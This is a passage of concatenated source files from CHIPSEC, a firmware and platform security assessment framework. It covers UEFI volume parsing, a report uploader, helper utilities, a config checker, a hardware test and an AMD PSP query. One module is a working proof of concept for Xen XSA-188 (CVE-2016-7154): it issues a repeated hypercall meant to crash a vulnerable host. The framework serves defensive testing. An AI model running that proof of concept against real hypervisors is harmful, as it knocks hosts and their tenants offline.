            # next_offset = fof + 8
            cur_offset += 8
            continue
        Name0, IntegrityCheck, Type, Attributes, Size, State = struct.unpack(EFI_FFS_FILE_HEADER, FvImage[cur_offset:cur_offset + file_header_size])
        # Get File Header Size
        if Attributes & FFS_ATTRIB_LARGE_FILE:
            header_size = struct.calcsize(EFI_FFS_FILE_HEADER2)
        else:
            header_size = struct.calcsize(EFI_FFS_FILE_HEADER)

        # Get File size
        if Attributes & FFS_ATTRIB_LARGE_FILE and len(FvImage) > fof + struct.calcsize(EFI_FFS_FILE_HEADER2):
            fsize = struct.unpack("Q", FvImage[fof + file_header_size:fof + file_header_size + struct.calcsize("Q")])[0]
            fsize &= 0xFFFFFFFF
        if fsize == 0 or fsize > FvLength - cur_offset:
            fsize = get_3b_size(Size)

        # Validate fsize is a legal value
        if fsize == 0 or fsize > FvLength - cur_offset:
            logger().log_hal("WARNING: Unable to get correct file size for NextFwFile corrupt header information")
            break
        # Get next_offset
        update_or_deleted = (bit_set(State, EFI_FILE_MARKED_FOR_UPDATE, polarity)) or (bit_set(State, EFI_FILE_DELETED, polarity))
        if not ((bit_set(State, EFI_FILE_DATA_VALID, polarity)) or update_or_deleted):
            # else:
            cur_offset = align(cur_offset + 1, 8)
            continue
        Name = UUID(bytes_le=Name0)
        # TODO need to fix up checksum?
        fheader = struct.pack(EFI_FFS_FILE_HEADER, Name0, 0, Type, Attributes, Size, 0)
        hsum = FvChecksum8(fheader)
        if (Attributes & FFS_ATTRIB_CHECKSUM):
            fsum = FvChecksum8(FvImage[cur_offset + file_header_size:cur_offset + fsize])
        else:
            fsum = FFS_FIXED_CHECKSUM
        CalcSum = (hsum | (fsum << 8))
        _image = FvImage[cur_offset:cur_offset + fsize]
        res = EFI_FILE(cur_offset, Name, Type, Attributes, State, IntegrityCheck, fsize, _image, header_size, update_or_deleted, CalcSum)
        break
    return res


def NextFwFileSection(sections: bytes, ssize: int, sof: int, polarity: bool) -> Optional[EFI_SECTION]:
    EFI_COMMON_SECTION_HEADER_size = struct.calcsize(EFI_COMMON_SECTION_HEADER)
    res = None
    curr_offset = sof
    ssize = min(ssize, len(sections))
    while curr_offset + EFI_COMMON_SECTION_HEADER_size < ssize:
        Size, Type = struct.unpack(EFI_COMMON_SECTION_HEADER, sections[curr_offset:curr_offset + EFI_COMMON_SECTION_HEADER_size])
        Size = get_3b_size(Size)
        Header_Size = EFI_COMMON_SECTION_HEADER_size
        if Size == 0xFFFFFF and (curr_offset + EFI_COMMON_SECTION_HEADER_size + struct.calcsize("I")) < ssize:
            _start = curr_offset + EFI_COMMON_SECTION_HEADER_size
            _finish = _start + struct.calcsize("I")
            Size = struct.unpack("I", sections[_start:_finish])[0]
            Header_Size = EFI_COMMON_SECTION_HEADER_size + struct.calcsize("I")
        if Type in SECTION_NAMES.keys():
            sec_name = SECTION_NAMES[Type]
        else:
            sec_name = f'S_UNKNOWN_{Type:02X}'
        if (Size == 0xffffff and Type == 0xff) or (Size == 0):
            curr_offset = align(curr_offset + 4, 4)
            continue
        sec_body = sections[curr_offset:curr_offset + Size]
        res = EFI_SECTION(curr_offset, sec_name, Type, sec_body, Header_Size, align(Size, 4))
        break
    return res

# #################################################################################################
#
# UEFI Firmware Volume Parsing/Modification Functionality
#
# #################################################################################################


def align_image(image: bytes, size: int = 8, fill: bytes = b'\x00') -> bytes:
    return image.ljust(((len(image) + size - 1) // size) * size, fill)


def get_guid_bin(guid: UUID) -> bytes:
    values = str(guid).split('-')
    if [len(x) for x in values] == [8, 4, 4, 4, 12]:
        values = values[0:3] + [values[3][0:2], values[3][2:4]] + [values[4][x:x + 2] for x in range(0, 12, 2)]
        values = [int(x, 16) for x in values]
        return struct.pack('<LHHBBBBBBBB', *tuple(values))
    return b''


def assemble_uefi_file(guid: UUID, image: bytes) -> bytes:
    EFI_FFS_FILE_HEADER = "<16sHBBL"
    FileHeaderSize = struct.calcsize(EFI_FFS_FILE_HEADER)

    Type = EFI_FV_FILETYPE_FREEFORM
    CheckSum = 0x0000
    Attributes = 0x40
    Size = FileHeaderSize + len(image)
    State = 0xF8

    SizeState = (Size & 0x00FFFFFF) | (State << 24)
    FileHeader = struct.pack(EFI_FFS_FILE_HEADER, get_guid_bin(guid), CheckSum, Type, Attributes, (Size & 0x00FFFFFF))

    hsum = FvChecksum8(FileHeader)
    if (Attributes & FFS_ATTRIB_CHECKSUM):
        fsum = FvChecksum8(image)
    else:
        fsum = FFS_FIXED_CHECKSUM
    CheckSum = (hsum | (fsum << 8))

    return struct.pack(EFI_FFS_FILE_HEADER, get_guid_bin(guid), CheckSum, Type, Attributes, SizeState) + image


def assemble_uefi_section(image: bytes, uncomressed_size: int, compression_type: int) -> bytes:
    EFI_COMPRESSION_SECTION_HEADER = "<LLB"
    SectionType = EFI_SECTION_COMPRESSION
    SectionSize = struct.calcsize(EFI_COMPRESSION_SECTION_HEADER) + len(image)
    SectionHeader = struct.pack(EFI_COMPRESSION_SECTION_HEADER, (SectionSize & 0x00FFFFFF) | (SectionType << 24), uncomressed_size, compression_type)
    return SectionHeader + image


def assemble_uefi_raw(image: bytes) -> bytes:
    return align_image(struct.pack('<L', ((len(image) + 4) & 0x00FFFFFF) + (EFI_SECTION_RAW << 24)) + image)


def DecodeSection(SecType, SecBody, SecHeaderSize) -> None:
    pass



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2018, Eclypsium, Inc.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#



from flask import Flask, render_template, request
from werkzeug.utils import secure_filename
from logging import getLogger
from chipsec_parser import parse_chipsec_xml
from jinja2 import Environment, FileSystemLoader, select_autoescape
import tempfile
import os
import random
from typing import Any, Dict, List, Tuple

app = Flask(__name__)
logger = getLogger("ChipsecParser")
env = Environment(loader=FileSystemLoader('templates'),autoescape=select_autoescape(['html']))
upload_template = env.get_template("report.html")

def parse_file(f: request) -> Tuple[Dict[Any, Any], List[Any]]:
    save_path = os.path.join(tempfile.gettempdir(),secure_filename(f.filename) + str(random.randint(2**63,2**64)))
    f.save(save_path)
    suite_data, case_data = parse_chipsec_xml(save_path)
    os.unlink(save_path)
    return suite_data, case_data


@app.route('/', methods=['GET', 'POST'])
def upload() -> render_template:
    if request.method == 'POST':
        f = request.files['file']
        suite_data, case_data = parse_file(f)
        return render_template('report.html',suite=suite_data, cases=case_data)

    else:
        return render_template('upload.html')

@app.route("/healthz")
def healthz() -> Tuple[str, int]:
    return "{}", 200



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2010-2016, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#


"""
This module triggers host crash on vulnerable Xen 4.4

Reference:
    - `Proof-of-concept module for Xen XSA-188 <https://xenbits.xen.org/xsa/advisory-188.html>`_
        - CVE-2016-7154: "use after free in FIFO event channel code"
        - Discovered by Mikhail Gorobets

Usage:
    ``chipsec_main.py -m tools.vmm.xen.xsa188``

Examples:
    >>> chipsec_main.py -i -m tools.vmm.xen.xsa188

.. note::
    - Returns a Warning by default
    - System may be in an unknown state, further evaluation may be needed

.. important::
    - This module is designed to run in a VM environment
    - Behavior on physical HW is undefined

"""

from chipsec.module_common import BaseModule, CPU
from chipsec.library.returncode import ModuleResult
from chipsec.hal.vmm import VMM

EVENT_CHANNEL_OP = 32
EVTCHOP_INIT_CONTROL = 11

TAGS = [CPU]
METADATA_TAGS = ['OPENSOURCE', 'IA', 'TOOLS', 'VMM', 'XEN', 'XSA188']


class xsa188(BaseModule):
    def __init__(self):
        BaseModule.__init__(self)
        self.result.url = 'https://chipsec.github.io/modules/chipsec.modules.tools.vmm.xen.xsa188.html'

    def run(self, module_argv):
        self.logger.start_test('Xen XSA-188 PoC check')
        (args_va, args_pa) = self.cs.mem.alloc_physical_mem(0x1000, 0xFFFFFFFFFFFFFFFF)
        args = '\xFF' * 8 + '\x00' * 16
        self.cs.mem.write_physical_mem(args_pa, len(args), args)
        self.vmm = VMM(self.cs)
        self.vmm.hypercall64_five_args(EVENT_CHANNEL_OP, EVTCHOP_INIT_CONTROL, args_va)
        self.vmm.hypercall64_five_args(EVENT_CHANNEL_OP, EVTCHOP_INIT_CONTROL, args_va)

        self.logger.log_information('Module completed')
        self.logger.log_warning('System may be in an unknown state, further evaluation may be needed.')
        self.result.setStatusBit(self.result.status.POTENTIALLY_VULNERABLE)
        self.res = self.result.getReturnCode(ModuleResult.WARNING)
        return self.res



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2023, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

import string
from collections.abc import Iterable
from time import strftime
from typing import AnyStr


def get_datetime_str() -> str:
    return strftime('%a%b%d%y-%H%M%S')


def bytestostring(mbytes: AnyStr) -> str:
    if isinstance(mbytes, bytes) or isinstance(mbytes, bytearray):
        return mbytes.decode("latin_1")
    else:
        return mbytes


def stringtobytes(mstr: AnyStr) -> bytes:
    if isinstance(mstr, str):
        return mstr.encode("latin_1")
    else:
        return mstr


def is_printable(seq: AnyStr) -> bool:
    return set(bytestostring(seq)).issubset(set(string.printable))


def is_hex(maybe_hex: Iterable) -> bool:
    return all(char in string.hexdigits for char in maybe_hex)



# CHIPSEC: Platform Security Assessment Framework
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
#
from tests.hardware import test_ubuntu


class EliteBook1040UbuntuTest(test_ubuntu.GenericUbuntuTest):

    PRODUCT_NAME = 'HP EliteBook Folio 1040 G1'
    BIOS_VERSION = 'L83 Ver. 01.21'
    BOOT_MODE = test_ubuntu.GenericUbuntuTest.BOOT_MODE_LEGACY
    PASS = [
        "chipsec.modules.common.bios_smi",
        "chipsec.modules.common.bios_ts",
        "chipsec.modules.common.bios_wp",
        "chipsec.modules.common.smm",
        "chipsec.modules.common.smrr",
        "chipsec.modules.common.spi_desc",
        "chipsec.modules.common.spi_lock",
        "chipsec.modules.remap",
        "chipsec.modules.smm_dma",
    ]

    WARNING = [
        "chipsec.modules.common.secureboot.variables",
        "chipsec.modules.common.uefi.s3bootscript",
        "chipsec.modules.common.uefi.access_uefispec",
    ]

    def test_main(self):
        self._generic_main()



#!/usr/bin/env python3
# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2022-2023, Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@intel.com
#

from os import listdir
import os.path as op
import sys
import xml.etree.ElementTree as ET
from collections import namedtuple

sys.path.append(op.abspath(op.join(__file__, "..", "..")))
from chipsec.library.file import get_main_dir
from chipsec.library.defines import is_hex


class ConfigChecker():

    def __init__(self) -> None:
        self.BYTES_TO_BITS = 8
        self.inconsistency_found = False  # Global flag to track inconsistencies
        self.FieldInterval = namedtuple('FieldInterval', ['start', 'end'])
        self.cfg_path = op.join(get_main_dir(), 'chipsec', 'cfg')
        self.log_messages = []

    def _fields_overlap(self, field_intervals):
        field_intervals.sort(key=lambda f: f.start)
        for i in range(len(field_intervals) - 1):
            if field_intervals[i].end >= field_intervals[i + 1].start:
                return True
        return False

    def _get_register_size(self, reg, cfg_file):
        if 'type' in reg.attrib and reg.attrib['type'] == 'msr':
            # MSR registers are assumed 8 bytes
            register_size = 8 * self.BYTES_TO_BITS
        elif 'size' in reg.attrib:
            register_size = int(reg.attrib['size']) * self.BYTES_TO_BITS
        else:
            # Register does not contain a well-defined size
            self.log_messages.append(f'{cfg_file}: found a non-MSR register without an explictly defined size. ({reg.attrib["name"]})')
            self.inconsistency_found = True
            return None
        return register_size

    def _parse_register_fields(self, reg, register_size, cfg_file):
        register_end_index = 0
        field_intervals = []
        # Loop over all fields found in this register
        for field in reg.findall('./field'):
            try:
                # Running calculation of register's end index based on the fields we've seen so far
                current_register_end_index = int(field.attrib['bit']) + int(field.attrib['size'])
            except ValueError:
                # All fields must have a starting bit and a size
                self.log_messages.append(f'{cfg_file}: found a field without an integer value for bit or size. ({reg.attrib["name"]}, {field.attrib["name"]})')
                self.inconsistency_found = True
                continue
            # Collect intervals from fields' start bits and sizes
            field_intervals.append(self.FieldInterval(start=int(field.attrib['bit']), end=current_register_end_index - 1))
            # Update running calculation of register's end index
            if current_register_end_index > register_end_index:
                register_end_index = current_register_end_index
                if register_end_index > register_size:
                    # Updated register end index exceeds the register size that we calculated earlier
                    self.log_messages.append(f'{cfg_file}: found a field that is too large to fit in the register. ({reg.attrib["name"]}, {field.attrib["name"]})')
                    self.inconsistency_found = True

        # Calculate if there is any overlap in the field intervals
        if self._fields_overlap(field_intervals):
            self.log_messages.append(f'{cfg_file}: found overlapping fields in a register. ({reg.attrib["name"]})')
            self.inconsistency_found = True

    def check_platform_codes(self, root, cfg_file):
        if ('platform' in root.attrib):
            platform = root.attrib['platform']
            for sku in root.findall("./info/sku"):
                if 'code' in sku.attrib:
                    if sku.attrib['code'] != platform:
                        self.inconsistency_found = True
                        self.log_messages.append(f'ERROR: SKU platform code with DID {sku.attrib["did"]} in {cfg_file} is not equivalent to XML platform code ({platform})')
                else:
                    self.inconsistency_found = True
                    self.log_messages.append(f'ERROR: SKU with DID {sku.attrib["did"]} in {cfg_file} does not have a "code=" attribute.')

    def check_registers(self, root, cfg_file):
        REGISTER_INCONSISTENT = '{}: Register {} with offset {} should be of type \'{}\', not \'{}\''
        for reg in root.findall('./registers/register'):
            try:
                # Skip this register if it does not contain any fields
                if reg.find('./field') is None:
                    continue

                # Determine size in bits of current register
                register_size = self._get_register_size(reg, cfg_file)
                if register_size is None:
                    continue

                # Run through all fields in the register and flag issues along the way
                self._parse_register_fields(reg, register_size, cfg_file)
            except RuntimeError as e:
                self.log_messages.append(f'{cfg_file}: encountered unexpected exception at register {reg.attrib["name"]}. Error message: {e}')
                self.inconsistency_found = True

            if ('type' in reg.attrib) and ('offset' in reg.attrib) and (reg.attrib['type'] == 'pcicfg' or reg.attrib['type'] == 'mmcfg'):
                offset = int(reg.attrib['offset'], 16)
                if 0x0 <= offset <= 0xFF:
                    # Register must be either type pcicfg or mmcfg
                    if reg.attrib['type'] != 'pcicfg' and reg.attrib['type'] != 'mmcfg':
                        self.log_messages.append(REGISTER_INCONSISTENT.format(cfg_file, reg.attrib['name'], reg.attrib['offset'], 'pcicfg', reg.attrib['type']))
                        self.inconsistency_found = True
                elif 0xFF < offset <= 0xFFF:
                    # Register must be type mmcfg
                    if reg.attrib['type'] != 'mmcfg':
                        self.log_messages.append(REGISTER_INCONSISTENT.format(cfg_file, reg.attrib['name'], reg.attrib['offset'], 'mmcfg', reg.attrib['type']))
                        self.inconsistency_found = True

    def run_checks(self):
        # Iterate over all XML files in chipsec/cfg
        vid_list = [f for f in listdir(self.cfg_path) if op.isdir(op.join(self.cfg_path, f)) and is_hex(f)]
        for vid in vid_list:
            for cfg_file in listdir(op.join(self.cfg_path, vid)):
                filepath = op.join(self.cfg_path, vid, cfg_file)
                if op.isdir(filepath):
                    print("d", end="")
                    continue
                print(".", end="")
                tree = ET.parse(filepath)
                root = tree.getroot()
                self.check_registers(root, filepath)
                self.check_platform_codes(root, filepath)
                # Iterate over all registers within current cfg file

        print("")
        for message in self.log_messages:
            print(message)

        # Exit code 0 or 1
        return int(self.inconsistency_found)


if __name__ == '__main__':
    try:
        sys.exit(ConfigChecker().run_checks())
    except Exception as e:
        print(f'Error: {e}')
        sys.exit(1)



# CHIPSEC: Platform Security Assessment Framework
# Copyright (c) 2024, AMD Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; Version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
#
# Contact information:
# chipsec@amd.com
#

"""
"""

import time
from chipsec.library.logger import logger


class PSP:
    SMN_INDEX_ADDR = 0xb8
    SMN_DATA_ADDR = 0xbc
    SMU_PSP_SMN_BASE = 0x3800000
    SMU_PSP_MBOX_CMD_STATUS = SMU_PSP_SMN_BASE + 0x00010970
    SMU_PSP_MBOX_CMD_BUF_LO = SMU_PSP_SMN_BASE + 0x00010974
    SMU_PSP_MBOX_CMD_BUF_HI = SMU_PSP_SMN_BASE + 0x00010978
    PSP_CMD_GET_CAPABILITIES = 0x27
    PSP_CMD_GET_HSTI_STATE = 0x14
    TIMEOUT = 5

    def __init__(self, cs):
        self.cs = cs
        self.helper = cs.helper

    def smu_read32(self, reg):
        self.cs.pci.write_dword(0, 0, 0, self.SMN_INDEX_ADDR, reg)
        return self.cs.pci.read_dword(0, 0, 0, self.SMN_DATA_ADDR)

    def smu_write32(self, reg, val):
        self.cs.pci.write_dword(0, 0, 0, self.SMN_INDEX_ADDR, reg)
        return self.cs.pci.write_dword(0, 0, 0, self.SMN_DATA_ADDR, val)

    def psp_mbox_command(self, cmd):
        #  Command ID (bits [23:16]), Status (bits [15:0]) fields and Ready flag (bit #31)
        mbox_cmd_status_value = 0
        dword_size = 4
        num_buf = 4  # TODO: Build a table for each command
        buf_size = num_buf * dword_size  # TODO: Build a table for each command
        cmd = self.PSP_CMD_GET_HSTI_STATE

        # Todo: Add Reset and Recovery checks

        # poll for mailbox ready
        start_time = time.time()
        timeout = False
        while (True):
            mbox_cmd_status_value = self.smu_read32(self.SMU_PSP_MBOX_CMD_STATUS)
            timeout = (time.time() - start_time > self.TIMEOUT)
            if ((mbox_cmd_status_value & 0x80000000) or timeout):
                break

        if (timeout):
            logger().log_bad(f'Timeout polling for PSP Mailbox Ready (Idle)')
            return [0xbaddbadd]

        (buf_va, buf_pa) = self.helper.alloc_phys_mem(buf_size, 0x1000_0000_0000)

        # send physical address for msg buffer
        self.smu_write32(self.SMU_PSP_MBOX_CMD_BUF_LO, buf_pa & 0xFFFFFFFF)
        self.smu_write32(self.SMU_PSP_MBOX_CMD_BUF_HI, (buf_pa >> 32) & 0xFFFFFFFF)

        # send command
        mbox_cmd_status_value = (cmd << 16) & 0x00ff0000
        self.smu_write32(self.SMU_PSP_MBOX_CMD_STATUS, mbox_cmd_status_value)

        # poll command
        start_time = time.time()
        timeout = False

        while (True):
            mbox_cmd_status_value = self.smu_read32(self.SMU_PSP_MBOX_CMD_STATUS)
            timeout = (time.time() - start_time > self.TIMEOUT)
            if ((mbox_cmd_status_value & 0x80000000) or timeout):
                break

        if (timeout):
            logger().log_bad(f'Timeout polling for PSP Mailbox Ready (Complete)')
            self.helper.free_phys_mem(buf_va)
            return [0xbaddbadd]

        buffer = []
        for i in range(0, num_buf):
            buffer.append(int.from_bytes(self.helper.read_phys_mem(buf_pa + (i * dword_size), dword_size), 'little'))

        self.helper.free_phys_mem(buf_va)

        return buffer

    def query_HSTI(self) -> int:
        hsti_buffer = self.psp_mbox_command(self.PSP_CMD_GET_HSTI_STATE)
        if (len(hsti_buffer) > 1):
            return hsti_buffer[2]
        else:
            return 0
